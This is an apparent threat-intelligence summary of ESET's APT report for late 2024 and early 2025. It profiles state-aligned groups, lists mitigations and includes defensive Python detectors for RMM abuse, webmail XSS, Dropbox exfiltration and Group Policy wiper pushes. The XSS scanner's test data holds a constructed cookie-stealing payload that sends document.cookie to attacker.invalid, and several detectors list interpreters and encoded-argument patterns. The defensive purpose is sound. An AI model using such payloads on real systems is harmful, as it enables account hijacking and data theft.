Full Report
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025
Analysis Summary
# Threat Actor: Mustang Panda
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Continued persistent espionage campaigns during the monitored period (Q4 2024 – Q1 2025), focusing on European organizations, governmental institutions, and maritime transportation companies.
## Tactics, Techniques & Procedures
- Use of **Korplug** loaders.
- Deployment via **malicious USB drives**.
## Targeting
- Sectors: Governmental institutions, maritime transportation companies.
- Geography: Europe.
- Victims: Not named; governmental institutions and maritime transportation companies.
## Tools & Infrastructure
- Malware families used: **Korplug** loaders.
- Infrastructure: Not explicitly detailed.
## Implications
Represents the most active China-aligned threat actor monitored during the period, illustrating persistent espionage targeting critical sectors in Europe.
## Mitigations
Treat removable media as an initial-access vector in its own right rather than as a phishing problem: disable autorun/autoplay, enforce device control (allow only registered USB devices, or block execution from removable media entirely), and hunt for Korplug loader behaviour, which typically arrives as a DLL side-loaded by a legitimate signed executable copied alongside it.
***
# Threat Actor: DigitalRecyclers
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Targeting EU governmental entities.
## Tactics, Techniques & Procedures
- Usage of the **KMA VPN anonymization network**.
- Deployment of backdoors: **RClient**, **HydroRShell**, and **GiftBox**.
## Targeting
- Sectors: EU governmental entities.
- Geography: EU member states.
- Victims: Governmental entities.
## Tools & Infrastructure
- Malware families used: **RClient**, **HydroRShell**, **GiftBox**.
- Infrastructure: **KMA VPN anonymization network**.
## Implications
Continues to target European government infrastructure using established, multi-stage access tools.
## Mitigations
Flag authentications and inbound connections to government-facing services that originate from commercial anonymization VPN exit ranges (the KMA VPN network included); hunt for the RClient, HydroRShell and GiftBox backdoors and isolate confirmed hosts quickly, since the group deploys several backdoors in sequence.
***
# Threat Actor: PerplexedGoblin
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Employed a new espionage backdoor against a Central European government entity.
## Tactics, Techniques & Procedures
- Used a new espionage backdoor named **NanoSlate**.
## Targeting
- Sectors: Government entities.
- Geography: Central European country.
- Victims: One Central European government entity mentioned.
## Tools & Infrastructure
- Malware families used: **NanoSlate** (new espionage backdoor).
- Infrastructure: Not explicitly detailed.
## Implications
Demonstrates ongoing development of bespoke espionage toolsets by China-aligned actors.
## Mitigations
Focus detection efforts on identifying the NanoSlate backdoor behavior.
***
# Threat Actor: Webworm
## Attribution & Identity
China-aligned threat actor.
## Activity Summary
Targeted a Serbian government organization.
## Tactics, Techniques & Procedures
- Used **SoftEther VPN**, a legitimate VPN product that remains popular among China-aligned groups as a tunnelling tool.
## Targeting
- Sectors: Government organizations.
- Geography: Serbia.
- Victims: A Serbian government organization.
## Tools & Infrastructure
- Tools used: **SoftEther VPN**.
- Infrastructure: Not explicitly detailed.
## Implications
Highlights the abuse of legitimate, widely used VPN software among China-aligned groups, likely for covert remote access or C2 that blends into ordinary encrypted traffic.
## Mitigations
Inventory the VPN software that is authorized in the environment, alert on SoftEther VPN binaries or services appearing on hosts that have no business running a VPN endpoint, and block unapproved outbound VPN protocols at the perimeter.
***
# Threat Actor: ShadowPad Cluster (Attribution unclear beyond toolset)
## Attribution & Identity
Attribution not given beyond the toolset: the cluster is tracked by its use of ShadowPad, a backdoor shared among several China-aligned groups, rather than as a named actor.
## Activity Summary
Primarily engaged in espionage, but sporadically deploys ransomware for financial gain.
## Tactics, Techniques & Procedures
- Utilizes **ShadowPad** implant.
## Targeting
- Sectors: Not explicitly detailed, but implied espionage targets.
- Geography: Not explicitly detailed.
- Victims: Not specifically named.
## Tools & Infrastructure
- Malware families used: **ShadowPad**.
- Infrastructure: Not explicitly detailed.
## Implications
Represents a dual-purpose cluster in which an espionage intrusion can turn into a financially motivated ransomware deployment, so a ShadowPad implant should be treated as a possible precursor to extortion rather than as espionage alone.
## Mitigations
Implement layered defenses capable of detecting both espionage implants and ransomware execution.
***
# Threat Actor: Worok
## Attribution & Identity
Threat actor whose confirmed use of several shared espionage toolsets led to the correction of earlier third-party attributions that had assigned those toolsets to other groups.
## Activity Summary
Frequent use of shared espionage toolsets across operations.
## Tactics, Techniques & Procedures
- Frequent use of shared espionage toolsets, including: **HDMan**, **PhantomNet**, and **Sonifake**.
## Targeting
- Sectors: Not explicitly detailed.
- Geography: Not explicitly detailed.
- Victims: Not specifically named.
## Tools & Infrastructure
- Malware families used: **HDMan**, **PhantomNet**, **Sonifake**.
- Infrastructure: Not explicitly detailed.
## Implications
Clarifies attribution issues surrounding commonly used espionage toolsets, confirming Worok as a primary user.
## Mitigations
Maintain accurate threat intelligence regarding toolset lineage to avoid misattributing activity.
***
# Threat Actor: MuddyWater
## Attribution & Identity
Iran-aligned threat actor.
## Activity Summary
Frequently leveraged RMM software in spearphishing attacks. Collaborated closely with **Lyceum** (an OilRig subgroup) during targeting activities.
## Tactics, Techniques & Procedures
- Frequently leveraged **Remote Monitoring and Management (RMM) software** in initial compromise stages.
## Targeting
- Sectors: Manufacturing.
- Geography: Israel.
- Victims: An Israeli manufacturing company.
## Tools & Infrastructure
- Tools used: Various **RMM software**.
- Infrastructure: Not explicitly detailed.
## Implications
Demonstrates collaborative efforts between Iran-aligned groups (MuddyWater and Lyceum) focusing on specific economic sectors.
## Mitigations
Inventory the RMM products that are authorized, block installation and execution of all others with application control, and alert when any RMM binary is spawned by a mail client, browser or script host, runs from a user-writable path, or connects to a tenant the organization does not own.
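The RMM abuse described above lends itself to a concrete endpoint check. The script below is an added example written for this summary, not code from ESET and not a description of MuddyWater's actual tooling: it triages process-creation events for RMM binaries that are not approved on the host, are launched by a mail client, browser or script host, or are unsigned. The product catalogue, approved-host table, suspect-parent list, signer strings and sample events are all constructed assumptions.

```python
"""Triage process-creation telemetry for RMM tools that do not fit the
approved deployment.  Added example, not ESET's code and not a description of
MuddyWater's tooling: the product catalogue, the approved-host table, the
suspect-parent list, the signer strings and the sample events are
constructed assumptions for illustration."""
import fnmatch
from dataclasses import dataclass

# Assumed catalogue: RMM product label -> lower-case executable name globs.
RMM_BINARIES = {
    "anydesk": ["anydesk.exe", "anydesk_*.exe"],
    "screenconnect": ["screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"],
    "atera": ["ateraagent.exe", "agentpackage*.exe"],
    "teamviewer": ["teamviewer.exe", "tv_*.exe"],
}

# Assumed inventory: the only hosts IT has sanctioned for each product.
APPROVED_HOSTS = {"screenconnect": {"helpdesk-01", "helpdesk-02"}}

# Parents that should never launch an RMM binary: mail/office clients, browsers
# and script hosts are the usual end of a spearphishing delivery chain.
SUSPECT_PARENTS = {
    "outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe",
    "chrome.exe", "msedge.exe", "firefox.exe",
    "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
}


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    signer: str         # Authenticode publisher; "" when unsigned


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_rmm(image: str):
    """Return the RMM product label for an image path, or None if it is not RMM."""
    name = _basename(image)
    for product, patterns in RMM_BINARIES.items():
        if any(fnmatch.fnmatchcase(name, p) for p in patterns):
            return product
    return None


def evaluate(event: ProcessEvent):
    """Return (severity, reason) findings for one event; empty list if benign."""
    product = classify_rmm(event.image)
    if product is None:
        return []
    findings = []
    if event.host.lower() not in APPROVED_HOSTS.get(product, set()):
        findings.append(("high", f"{product} not approved on host {event.host}"))
    parent = _basename(event.parent_image)
    if parent in SUSPECT_PARENTS:
        findings.append(("high", f"{product} launched by {parent}"))
    if not event.signer:
        findings.append(("medium", f"{product} binary is unsigned"))
    return findings


def triage(events):
    """Keep only events with findings, as (event, findings) pairs."""
    return [(e, f) for e in events if (f := evaluate(e))]


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    ProcessEvent("helpdesk-01", "it-admin",
                 "C:\\Program Files\\ScreenConnect Client\\ScreenConnect.ClientService.exe",
                 "C:\\Windows\\System32\\services.exe", "ScreenConnect Software"),
    ProcessEvent("eng-ws-17", "jdoe",
                 "C:\\Users\\jdoe\\AppData\\Local\\Temp\\AnyDesk.exe",
                 "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
                 "AnyDesk Software GmbH"),
    ProcessEvent("eng-ws-17", "jdoe", "C:\\Windows\\notepad.exe",
                 "C:\\Windows\\explorer.exe", "Microsoft Windows"),
]

if __name__ == "__main__":
    for event, findings in triage(SAMPLE_EVENTS):
        for severity, reason in findings:
            print(f"[{severity}] {event.host}/{event.user}: {reason}")
```

Running it on the constructed events reports only the AnyDesk launch from Outlook on the unapproved workstation; the sanctioned ScreenConnect service on the helpdesk host and the unrelated notepad launch produce nothing. In production the same three questions (approved on this host? launched by what? signed by whom?) are what turn a noisy "RMM seen" alert into an actionable one.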
***
# Threat Actor: Lyceum (OilRig Subgroup)
## Attribution & Identity
Subgroup of **OilRig**, Iran-aligned.
## Activity Summary
Collaborated closely with MuddyWater to target an Israeli manufacturing company.
## Tactics, Techniques & Procedures
- Not specified beyond collaboration details.
## Targeting
- Sectors: Manufacturing.
- Geography: Israel.
- Victims: An Israeli manufacturing company.
## Tools & Infrastructure
- Not separately detailed; the joint operation relied on the RMM software described under MuddyWater.
## Implications
Indicates organized, goal-oriented collaboration between distinct Iran-aligned units for targeted impact.
## Mitigations
Monitor for activity indicative of multiple threat actor operations converging on a single target.
***
# Threat Actor: BladedFeline
## Attribution & Identity
Iran-aligned threat actor (implied by context following MuddyWater/Lyceum).
## Activity Summary
Revisited an earlier victim, a telecommunications company in Uzbekistan, coinciding with diplomatic outreach by Iran.
## Tactics, Techniques & Procedures
- Not specified.
## Targeting
- Sectors: Telecommunications.
- Geography: Uzbekistan.
- Victims: A telecommunications company (previous victim revisited).
## Tools & Infrastructure
- Not specified.
## Implications
Suggests potential correlation between state diplomatic activities and targeted espionage operations in the region.
## Mitigations
Maintain heightened scrutiny on critical infrastructure, such as telecom providers, during periods of geopolitical shifts.
***
# Threat Actor: CyberToufan
## Attribution & Identity
Iran-aligned threat actor.
## Activity Summary
Conducted **destructive operations**, deploying a wiper attack against multiple organizations.
## Tactics, Techniques & Procedures
- Deployed a **wiper attack**.
## Targeting
- Sectors: Not specified.
- Geography: Israel.
- Victims: Multiple organizations in Israel.
## Tools & Infrastructure
- Malware families used: **Wiper** (specific name not provided).
- Infrastructure: Not explicitly detailed.
## Implications
Represents a shift towards destructive capabilities among Iran-aligned actors targeting Israel.
## Mitigations
Implement robust offline/immutable backups and advanced endpoint detection to counter destructive malware.
***
# Threat Actor: DeceptiveDevelopment
## Attribution & Identity
North Korea-aligned threat actor, particularly active in financially motivated campaigns.
## Activity Summary
Significantly broadened targeting by using fake job listings, primarily within the cryptocurrency, blockchain, and finance sectors, and employed new social-engineering techniques (ClickFix attacks, bogus GitHub issue posts) to distribute malware. The Bybit cryptocurrency theft in the same period was attributed by the FBI to a different North Korea-aligned group, TraderTraitor (covered separately below).
## Tactics, Techniques & Procedures
- Social Engineering: **Fake job listings**, **ClickFix attacks**, **bogus GitHub issue posts**.
- Deployed **multiplatform WeaselStore malware**.
## Targeting
- Sectors: Cryptocurrency, blockchain, finance.
- Geography: Not stated; the lures are aimed at people in these sectors regardless of location.
- Victims: Job seekers in finance, cryptocurrency and blockchain who are lured by fake listings.
## Tools & Infrastructure
- Malware families used: **WeaselStore** (multiplatform).
- Infrastructure: Not explicitly detailed.
## Implications
A financially motivated campaign that uses current social-engineering lures (fake recruitment, ClickFix prompts, fake GitHub issues) against people working in emerging financial technologies.
## Mitigations
Treat unsolicited job offers, "coding assessments" and repository links as untrusted: run recruiter-supplied code only in an isolated VM, never paste commands from a web page or GitHub issue into a terminal or the Run dialog (the ClickFix pattern), and keep wallet keys off machines used for such work.
***
# Threat Actor: TraderTraitor
## Attribution & Identity
North Korea-aligned threat actor, linked by the FBI to the Bybit theft.
## Activity Summary
Involved in the **Bybit cryptocurrency theft**, executing a supply-chain compromise of **Safe{Wallet}**.
## Tactics, Techniques & Procedures
- **Supply-chain compromise**.
## Targeting
- Sectors: Cryptocurrency/Finance.
- Geography: Not specified.
- Victims: Bybit via Safe{Wallet} ($1.5 billion in losses).
## Tools & Infrastructure
- Infrastructure targeted: **Safe{Wallet}**.
## Implications
Represents one of the most significant financial losses attributed to a North Korea-aligned group during the monitoring period.
## Mitigations
Treat the software supply chain of wallet front ends and signing tools as part of the attack surface: pin and verify dependencies and build artifacts, monitor the JavaScript actually served to users for unreviewed changes, and require signers of high-value multisig transfers to verify transaction details on an independent device rather than trusting what the web interface displays.
***
# Threat Actor: Kimsuky and Konni
## Attribution & Identity
North Korea-aligned threat actors.
## Activity Summary
Returned to normal activity levels in early 2025 after a decline, shifting primary targeting away from English-speaking think tanks, NGOs, and North Korea experts and toward South Korean entities and diplomatic personnel.
## Tactics, Techniques & Procedures
- Not detailed beyond the targeting shift.
## Targeting
- Sectors: Shifted away from think tanks/NGOs. Primary pivot to **South Korean entities** and **diplomatic personnel**.
- Geography: South Korea (primary focus).
- Victims: South Korean entities and diplomatic personnel.
## Tools & Infrastructure
- Not specified.
## Implications
Indicates operational tempo shifts likely aligned with evolving geopolitical priorities concerning the Korean peninsula.
## Mitigations
Increased monitoring of communications directed at South Korean diplomatic and academic targets.
***
# Threat Actor: Andariel
## Attribution & Identity
North Korea-aligned threat actor.
## Activity Summary
Resurfaced after a year of inactivity with a sophisticated attack against a South Korean industrial software company.
## Tactics, Techniques & Procedures
- Executed a **sophisticated attack**.
## Targeting
- Sectors: Industrial software.
- Geography: South Korea.
- Victims: A South Korean industrial software company.
## Tools & Infrastructure
- Not specified.
## Implications
Return of a significant, previously dormant actor with a targeted, high-value operational focus.
## Mitigations
Companies dealing with industrial control systems or related software development should reassess threat exposure to previously dormant actors.
***
# Threat Actor: Sednit
## Attribution & Identity
Russia-aligned threat actor.
## Activity Summary
Maintained aggressive campaigns, refining its exploitation of XSS vulnerabilities in webmail services. Successfully used an MDaemon zero-day against Ukrainian companies and expanded Operation RoundPress, originally focused on Roundcube, to Horde, MDaemon, and Zimbra.
## Tactics, Techniques & Procedures
- Exploited **Cross-Site Scripting (XSS)** vulnerabilities in webmail services.
- Leveraged **CVE‑2024‑11182** (Zero-day in **MDaemon Email Server**) against Ukrainian companies.
- Affected platforms: **Roundcube**, **Horde**, **MDaemon**, and **Zimbra**.
## Targeting
- Sectors: Unspecified, but focused on organizations utilizing vulnerable webmail infrastructure.
- Geography: Ukraine and EU countries.
- Victims: Ukrainian companies (specifically targeted with the MDaemon zero-day).
## Tools & Infrastructure
- Campaigns: **Operation RoundPress**.
- Infrastructure targeted: Webmail servers.
## Implications
Demonstrates persistent focus on penetrating EU/Ukrainian infrastructure using high-impact vulnerability exploitation, including novel zero-days.
## Mitigations
Patch MDaemon for CVE‑2024‑11182 immediately and keep Roundcube, Horde and Zimbra current; on every webmail platform, sanitize HTML message bodies on the server side, deploy a restrictive Content Security Policy, and mark session cookies HttpOnly, since the attack chain begins with a crafted email that executes script in the victim's browser as soon as the message is opened.
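Because the RoundPress chain starts with an HTML message that executes script inside the webmail client, a mail gateway or a sweep over stored mailboxes can look for the constructs that make such a message work. The scanner below is an added example for this summary, not ESET's code and not a reproduction of any RoundPress payload; the two message bodies are constructed, and the tag and attribute lists are the editor's selection of common XSS vectors rather than anything the report enumerates.

```python
"""Flag HTML email bodies carrying the constructs that produce stored XSS in a
webmail client (the class of bug behind Operation RoundPress).  Added example,
not ESET's code and not a reproduction of any RoundPress payload; the two
sample messages are constructed.  This is a hunt/triage aid for a mail gateway
or an mbox sweep, not a sanitizer: it reports, it does not clean."""
from html.parser import HTMLParser

# Tags that should never appear in a mail body rendered inside a web client.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math", "base"}
# Attributes whose value is a URL and so may carry a script scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "background"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")


def _dangerous_url(value: str) -> bool:
    """True if the value's scheme is a script scheme, even when padded with
    whitespace or control characters that browsers strip ('jav\\tascript:')."""
    scheme = "".join(ch for ch in value if ch.isalpha() or ch == ":").lower()
    return scheme.startswith(SCRIPT_SCHEMES)


class XssFinder(HTMLParser):
    """Collect (kind, detail) findings while parsing.  Attribute values arrive
    already entity-decoded, so '&#x6a;avascript:' is seen as 'javascript:'."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(("tag", tag))
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{name}"))
            elif name in URL_ATTRS and _dangerous_url(value):
                self.findings.append(("url", f"{tag}@{name}={value[:40]}"))
            elif name == "style" and "expression(" in value.lower():
                self.findings.append(("css-expression", tag))


def scan_html(body: str):
    """Return the list of (kind, detail) findings for one HTML body."""
    finder = XssFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


def is_suspicious(body: str) -> bool:
    return bool(scan_html(body))


# Constructed sample bodies (not real messages).
BENIGN = """<html><body><p>Hello,</p>
<a href="https://example.org/news">Read more</a>
<img src="https://example.org/logo.png" alt="logo"></body></html>"""

MALICIOUS = """<html><body><p>Invoice attached.</p>
<img src="x" onerror="fetch('https://attacker.invalid/?c='+document.cookie)">
<a href="jav&#x09;ascript:alert(1)">open</a></body></html>"""

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_html(body))
```

The two evasions the constructed malicious body uses, an event handler on a broken image and a tab-split `javascript:` scheme hidden behind an entity, are exactly the kind a naive regex for `<script>` misses; decoding entities before inspection and normalizing the URL scheme is what makes the check hold up. A positive hit should quarantine the message for analysis, not just log it.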
***
# Threat Actor: RomCom
## Attribution & Identity
Russia-aligned threat actor.
## Activity Summary
Demonstrated advanced capabilities by deploying zero-day exploits against widely used software.
## Tactics, Techniques & Procedures
- Deployed **zero-day exploits** against:
- **Mozilla Firefox (CVE‑2024‑9680)**.
- **Microsoft Windows (CVE‑2024‑49039)**.
## Targeting
- Sectors: Unspecified.
- Geography: Not stated in this summary.
- Victims: Users of vulnerable Firefox and Windows versions targeted by the group.
## Tools & Infrastructure
- Vulnerabilities exploited: CVE‑2024‑9680, CVE‑2024‑49039.
## Implications
Indicates access to and willingness to deploy sophisticated, high-value zero-day tools against common desktop and enterprise software.
## Mitigations
Apply the Mozilla fix for CVE‑2024‑9680 and the Microsoft fix for CVE‑2024‑49039 (a Windows privilege-escalation bug that let the browser exploit escape the sandbox); because both were exploited before patches existed, also rely on behavioural detection such as unexpected child processes of the browser, and keep browsers on the fastest update channel.
***
# Threat Actor: Gamaredon
## Attribution & Identity
Russia-aligned threat actor.
## Activity Summary
Remained the most prolific actor targeting Ukraine. Enhanced malware obfuscation techniques and introduced a new file stealer leveraging Dropbox for C2/exfiltration.
## Tactics, Techniques & Procedures
- Enhanced **malware obfuscation**.
- Introduced **PteroBox** (a file stealer).
- Utilizes **Dropbox** for C2/exfiltration.
## Targeting
- Sectors: Unspecified.
- Geography: Ukraine (primary focus).
- Victims: Not specifically named.
## Tools & Infrastructure
- Malware families used: **PteroBox**.
- Infrastructure leveraged: **Dropbox** (for C2/exfiltration).
## Implications
Continues high operational tempo against Ukraine, utilizing common cloud services for stealthy infrastructure operations.
## Mitigations
Dropbox is legitimate traffic in most networks, so alert on anomalies rather than on the service itself: hosts or users that start calling the Dropbox API (api.dropboxapi.com, content.dropboxapi.com) for the first time, non-browser user agents, and upload volumes out of proportion to normal use, then tie the hits back to the originating process on the endpoint.
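An added example (not ESET's code, and not PteroBox's actual traffic pattern) of that anomaly-based approach: it parses web-proxy logs and flags clients whose Dropbox API use departs from the baseline. The API hostnames and the /2/files/upload endpoint are Dropbox's public names; the log format, the sanctioned-host list, the user-agent heuristics, the size threshold and every log line are constructed assumptions.

```python
"""Hunt for file exfiltration over the Dropbox API in web-proxy logs.  Added
example, not ESET's code and not PteroBox's actual traffic: the hostnames and
the /2/files/upload endpoint are Dropbox's public API names, but the log
format, the sanctioned-host list, the user-agent heuristics, the size
threshold and every log line below are constructed assumptions."""
import re
from collections import defaultdict

DROPBOX_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com", "notify.dropboxapi.com"}
UPLOAD_PATHS = ("/2/files/upload", "/2/files/upload_session/")
SANCTIONED_HOSTS = {"fin-ws-03"}          # assumed: official client deployed by IT
# Assumed heuristic: markers of HTTP libraries and script hosts; an MSIE-era
# string on a current estate is a tell for a scripted client, not a browser.
SCRIPTED_UA_MARKERS = ("python-requests", "curl/", "powershell", "winhttp", "go-http-client", "msie")
UPLOAD_BYTES_THRESHOLD = 1_000_000

# Assumed proxy format: ts host user method url status bytes_out "user-agent"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<host>\S+) (?P<user>\S+) (?P<method>[A-Z]+) '
    r'(?P<url>\S+) (?P<status>\d{3}) (?P<bytes>\d+) "(?P<ua>[^"]*)"$'
)
URL_RE = re.compile(r"https?://([^/?#]+)([^?#]*)")


def parse(line: str):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(lines):
    """Return {(host, user): [reasons]} for clients whose Dropbox API use is anomalous."""
    clients = defaultdict(lambda: {"upload_bytes": 0, "calls": 0, "agents": set()})
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        m = URL_RE.match(rec["url"])
        if not m or m.group(1).lower() not in DROPBOX_API_HOSTS:
            continue
        c = clients[(rec["host"], rec["user"])]
        c["calls"] += 1
        c["agents"].add(rec["ua"])
        if (m.group(2) or "/").startswith(UPLOAD_PATHS):
            c["upload_bytes"] += int(rec["bytes"])

    flagged = {}
    for (host, user), c in clients.items():
        reasons = []
        if host not in SANCTIONED_HOSTS:
            reasons.append("Dropbox API use from unsanctioned host")
        scripted = [ua for ua in c["agents"] if any(k in ua.lower() for k in SCRIPTED_UA_MARKERS)]
        if scripted:
            reasons.append(f"script-style user agent: {scripted[0]}")
        if c["upload_bytes"] >= UPLOAD_BYTES_THRESHOLD:
            reasons.append(f"uploaded {c['upload_bytes']} bytes across {c['calls']} API calls")
        if reasons:
            flagged[(host, user)] = reasons
    return flagged


# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
2025-02-11T09:12:03Z fin-ws-03 alice POST https://api.dropboxapi.com/2/files/list_folder 200 412 "Dropbox-Desktop/220.4.4"
2025-02-11T09:12:05Z fin-ws-03 alice POST https://content.dropboxapi.com/2/files/upload 200 20480 "Dropbox-Desktop/220.4.4"
2025-02-11T11:40:17Z hr-ws-22 bob POST https://content.dropboxapi.com/2/files/upload 200 734003 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0)"
2025-02-11T11:41:02Z hr-ws-22 bob POST https://content.dropboxapi.com/2/files/upload 200 612880 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0)"
2025-02-11T11:41:30Z hr-ws-22 bob POST https://api.dropboxapi.com/2/files/list_folder 200 380 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0)"
2025-02-11T12:00:00Z web-ws-05 carol GET https://www.example.org/index.html 200 5120 "Mozilla/5.0"
"""

if __name__ == "__main__":
    for (host, user), reasons in analyze(SAMPLE_LOG.splitlines()).items():
        print(f"{host}/{user}: " + "; ".join(reasons))
```

On the constructed log only `hr-ws-22/bob` is flagged, for three independent reasons (unsanctioned host, script-style user agent, roughly 1.3 MB uploaded in a short burst); the sanctioned finance workstation with the desktop client is silent. Real deployments should replace the static sanctioned list with a per-host baseline learned over a few weeks so that first-seen Dropbox use stands out on its own.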
***
# Threat Actor: Sandworm
## Attribution & Identity
Russia-aligned threat actor (infamous group).
## Activity Summary
Intensified **destructive operations** against Ukrainian energy companies. Utilized RMM tools in early compromise phases and deployed a new wiper.
## Tactics, Techniques & Procedures
- Deployed a new wiper named **ZEROLOT**.
- Utilized **RMM tools** in early compromise stages.
- Deployed ZEROLOT via **Active Directory Group Policy**.
## Targeting
- Sectors: Energy companies.
- Geography: Ukraine.
- Victims: Ukrainian energy companies.
## Tools & Infrastructure
- Malware families used: **ZEROLOT** (wiper).
- Infrastructure used: **Active Directory Group Policy** for deployment.
## Implications
Represents a severe threat to operational continuity, focusing destructive actions on critical national infrastructure (energy sector).
## Mitigations
Restrict who can create or edit GPOs and alert on changes to SYSVOL (new scheduled tasks, startup scripts or binaries), because a wiper pushed through Group Policy reaches every host in the GPO's scope at the next policy refresh; restrict RMM tools; and maintain offline, tested backups and IT/OT segmentation rather than relying on a signature for a wiper that can be rebuilt.
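One concrete check for the Group Policy delivery path: Group Policy Preferences scheduled-task definitions live in SYSVOL as ScheduledTasks.xml, and an attacker pushing a payload domain-wide leaves a recognizable shape there (an immediate task, recently changed, running as SYSTEM, executing a binary from SYSVOL or a writable path). The audit below is an added example for this summary, not ESET's code and not a description of how ZEROLOT was actually staged; the XML layout is assumed from the GPP format, and the sample document, reference time, path lists and task names are constructed.

```python
"""Audit a Group Policy Preferences ScheduledTasks.xml (under a GPO's
Machine\\Preferences\\ScheduledTasks folder in SYSVOL) for the shape of a
domain-wide payload push: an immediate task, recently changed, running as
SYSTEM, executing a binary from SYSVOL or a writable path.  Added example, not
ESET's code and not a description of how ZEROLOT was staged; the XML layout is
assumed from the GPP format, and the sample document, reference time, path
lists and task names are constructed."""
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

TASK_TAGS = {"ImmediateTaskV2", "TaskV2", "ImmediateTask", "Task"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
WRITABLE_PREFIXES = ("\\\\", "c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")
SUSPICIOUS_ARGS = ("-enc", "-e ", "bypass", "hidden", "iex", "downloadstring")
REFERENCE_NOW = datetime(2025, 3, 15, 10, 0, 0)   # assumed audit time for the sample


def _text(elem, path):
    node = elem.find(path)
    return (node.text or "").strip() if node is not None else ""


def load_tasks(xml_text: str):
    """Return one dict per task definition in a ScheduledTasks.xml document."""
    tasks = []
    for elem in ET.fromstring(xml_text).iter():
        props = elem.find("Properties")
        if elem.tag not in TASK_TAGS or props is None:
            continue
        tasks.append({
            "name": elem.get("name", ""),
            "kind": elem.tag,
            "changed": elem.get("changed", ""),
            "run_as": props.get("runAs", ""),
            "command": _text(props, ".//Actions/Exec/Command"),
            "arguments": _text(props, ".//Actions/Exec/Arguments"),
        })
    return tasks


def score(task, now=REFERENCE_NOW, recent_days=7):
    """Return the reasons a task deserves a closer look (empty if none)."""
    reasons = []
    cmd, args = task["command"].lower(), task["arguments"].lower()
    if task["kind"].startswith("Immediate"):
        reasons.append("immediate task: runs on next policy refresh on every targeted host")
    if task["run_as"].lower().endswith("system"):
        reasons.append("runs as SYSTEM")
    try:
        changed = datetime.strptime(task["changed"], "%Y-%m-%d %H:%M:%S")
        if now - changed <= timedelta(days=recent_days):
            reasons.append(f"changed within {recent_days} days ({task['changed']})")
    except ValueError:
        reasons.append("missing or unparseable 'changed' timestamp")
    if cmd.startswith(WRITABLE_PREFIXES):
        reasons.append(f"command in SYSVOL/writable path: {task['command']}")
    elif ":\\" in cmd and not cmd.startswith(TRUSTED_PREFIXES):
        reasons.append(f"command outside trusted paths: {task['command']}")
    if any(i in cmd for i in INTERPRETERS) and any(k in args for k in SUSPICIOUS_ARGS):
        reasons.append("script interpreter with encoded/hidden arguments")
    return reasons


def audit(xml_text: str, now=REFERENCE_NOW):
    """Return [(task name, reasons)] for the tasks that scored at least one reason."""
    return [(t["name"], r) for t in load_tasks(xml_text) if (r := score(t, now))]


# Constructed sample: one routine maintenance task and one freshly pushed
# immediate task that launches a binary from SYSVOL as SYSTEM.
SAMPLE_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="DiskCleanup"
          changed="2024-10-02 08:15:00" uid="{11111111-1111-1111-1111-111111111111}">
    <Properties action="U" name="DiskCleanup" runAs="CORP\svc_maint" logonType="Password">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>C:\Windows\System32\cleanmgr.exe</Command><Arguments>/sagerun:1</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Update"
          changed="2025-03-14 02:11:07" uid="{22222222-2222-2222-2222-222222222222}">
    <Properties action="C" name="Update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>\\corp.local\SYSVOL\corp.local\scripts\update.exe</Command><Arguments></Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>"""

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_XML):
        print(name)
        for r in reasons:
            print("  -", r)
```

Run against every ScheduledTasks.xml under `\\<domain>\SYSVOL\<domain>\Policies\` on a schedule, and diff the output against the previous run: the benign maintenance task never surfaces, while the constructed "Update" task scores on all four indicators at once. Pair this with a file-integrity alert on SYSVOL so that the audit is triggered by the change rather than by the clock.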
***
# Threat Actor: APT-C-60
## Attribution & Identity
Lesser-known group; alignment not stated in this summary. The APT-C- prefix is a vendor numbering scheme and does not by itself indicate which state the group is aligned with.
## Activity Summary
Focusing operations specifically on individuals based in Japan who are possibly linked to North Korea.
## Tactics, Techniques & Procedures
